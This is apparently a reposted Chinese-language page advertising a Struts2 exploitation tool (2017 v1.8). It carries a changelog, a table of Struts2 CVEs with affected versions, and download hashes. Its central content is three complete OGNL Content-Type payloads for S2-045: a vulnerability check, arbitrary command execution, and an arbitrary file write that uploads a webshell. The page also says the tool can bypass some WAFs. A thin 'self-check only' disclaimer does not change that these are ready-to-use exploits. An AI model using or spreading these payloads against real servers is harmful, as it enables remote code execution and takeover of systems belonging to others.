s2 安恒 漏洞验证工具_Struts2漏洞利用工具下载(更新2017-V1.8版增加S2-045/S2-046)
Struts2漏洞利用工具下載(已更新V1.8版)
2017-03-21:
增加S2-046,官方發(fā)布S2-046和S2-045漏洞引發(fā)原因一樣,只是利用漏洞的位置發(fā)生了變化,S2-046方式可能繞過部分WAF防護,存在S2-045就存在S2-046。http://struts.apache.org/docs/s2-046.html、
2017-03-07:
增加安恒信息研究員nike.zheng發(fā)現(xiàn)的S2-045,jakatar處理復雜數(shù)據(jù)類型時,異常處理不當,導致OGNL代碼執(zhí)行,通過在請求的Content-Type頭中構造OGNL表達式來執(zhí)行Java代碼。http://struts.apache.org/docs/s2-045.html
相關exp:
S2-045:
1.驗證漏洞,修改Content-Type,返回內容為“webpath”代表存在漏洞。
%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('web')).(#res.getWriter().print('path')).(#res.getWriter().flush()).(#res.getWriter().close())}
2.執(zhí)行命令
%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#s=new java.util.Scanner((new java.lang.ProcessBuilder('[cmd]'.toString().split('s'))).start().getInputStream()).useDelimiter('AAAA')).(#str=#s.hasNext()?#s.next():'').(#res.getWriter().print(#str)).(#res.getWriter().flush()).(#res.getWriter().close()).(#s.close())}
3.上傳文件:
%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(new java.io.BufferedWriter(new java.io.FileWriter([path])).append(#req.getHeader('test')).close()).(#res.getWriter().print('oko')).(#res.getWriter().print('kok/')).(#res.getWriter().print(#req.getContextPath())).(#res.getWriter().flush()).(#res.getWriter().close())}
S2-032 20160426??漏洞參考 http://seclab.dbappsecurity.com.cn/?p=924
更新日志:
2017-03-21:
增加S2-046,官方發(fā)布S2-046和S2-045漏洞引發(fā)原因一樣,只是利用漏洞的位置發(fā)生了變化,S2-046方式可能繞過部分WAF防護,存在S2-045就存在S2-046。http://struts.apache.org/docs/s2-046.html
2017-03-07:
增加安恒信息研究員nike.zheng發(fā)現(xiàn)的S2-045,jakatar處理復雜數(shù)據(jù)類型時,異常處理不當,導致OGNL代碼執(zhí)行,通過在請求的Content-Type頭中構造OGNL表達式來執(zhí)行Java代碼。http://struts.apache.org/docs/s2-045.html
2016-04-26:
增加最新的S2-032遠程代碼執(zhí)行漏洞,和S2-019很相似。
參考:http://seclab.dbappsecurity.com.cn/?p=924
2015-12-01:
采用scanner讀數(shù)據(jù)流,再也不用擔心s16不能執(zhí)行net?user/ipconfig/netstat?-an等命令了。
增加復雜數(shù)據(jù)包(multipart/form-data)提交方式進行漏洞利用,可繞過部分防護??蓤?zhí)行命令,暫時無法上傳文件。
2014-11-12:
最近遇到s19這個debug模式開啟導致代碼執(zhí)行,這個有點少,但還是有一些,為了方便大家把13版本修改了一下??梢岳眠@個漏洞執(zhí)行命令、上傳shell。
警告:
本工具為漏洞自查工具,請勿非法攻擊他人網(wǎng)站!
==漏洞編號==============影響版本=========================官方公告==========================================影響范圍=====
S2-045?CVE-2017-5638?Struts?2.3.5-2.3.31,?Struts?2.5-2.5.10?http://struts.apache.org/docs/s2-045.html?影響范圍較大
S2-037?CVE-2016-4438?Struts?2.3.20-2.3.28.1?http://struts.apache.org/docs/s2-037.html?影響范圍小
S2-032?CVE-2016-3081?Struts?2.3.18-2.3.28?http://struts.apache.org/release/2.3.x/docs/s2-032.html?影響范圍小
S2-020?CVE-2014-0094?Struts?2.0.0-2.3.16?http://struts.apache.org/release/2.3.x/docs/s2-020.html?影響范圍小
S2-019?CVE-2013-4316?Struts?2.0.0-2.3.15.1?http://struts.apache.org/release/2.3.x/docs/s2-019.html?影響范圍一般
S2-016?CVE-2013-2251?Struts?2.0.0-2.3.15?http://struts.apache.org/release/2.3.x/docs/s2-016.html?影響范圍非常大
S2-013?CVE-2013-1966?Struts?2.0.0-2.3.14?http://struts.apache.org/release/2.3.x/docs/s2-013.html?未添加,S2-016范圍內
S2-009?CVE-2011-3923?Struts?2.0.0-2.3.1.1?http://struts.apache.org/release/2.3.x/docs/s2-009.html?未添加,S2-016范圍內
S2-005?CVE-2010-1870?Struts?2.0.0-2.1.8.1?http://struts.apache.org/release/2.2.x/docs/s2-005.html?未添加,S2-016范圍內
僅提供驗證漏洞使用,請勿非法使用,產生的任何法律問題,一概與本人無關。
下載地址:
文件名稱: Struts2漏洞利用工具2017版.exe
文件大小: 104 KB (107008 字節(jié))
文件版本: 1.8.0.0
修改時間: 2017年03月22日,17:39:29
MD5: 3B405C30A7028E05742D0FBF0961E6B2
SHA1: 1D69338543544B31444D0173C08E706D57F148CB
CRC32: 97AC167B
計算時間: 0.00s
總結
以上是生活随笔為你收集整理的s2 安恒 漏洞验证工具_Struts2漏洞利用工具下载(更新2017-V1.8版增加S2-045/S2-046)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 特斯拉与瑞典工会冲突升温,专用零部件供应
- 下一篇: golang 切片 接口_Golang语